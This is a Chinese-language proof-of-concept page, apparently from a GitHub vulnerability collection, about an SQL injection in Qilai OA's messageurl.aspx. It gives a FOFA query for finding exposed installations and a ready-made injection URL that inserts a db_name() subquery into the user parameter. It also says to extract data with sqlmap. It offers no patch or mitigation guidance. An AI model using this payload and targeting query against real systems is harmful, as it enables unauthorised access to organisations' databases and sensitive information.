admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/启莱OA messageurl.aspx SQL注入漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

35 lines
574 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 启莱OA messageurl.aspx SQL注入漏洞
## 漏洞描述
启莱OA messageurl.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-2-1](./images/qilai-2-1.png)
存在SQL注入的文件为 messageurl.aspx
```plain
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-2-2](./images/qilai-2-2.png)
使用SQLmap对参数 user 进行注入
![qilai-2-3](./images/qilai-2-3.png)
Reference in New Issue View Git Blame Copy Permalink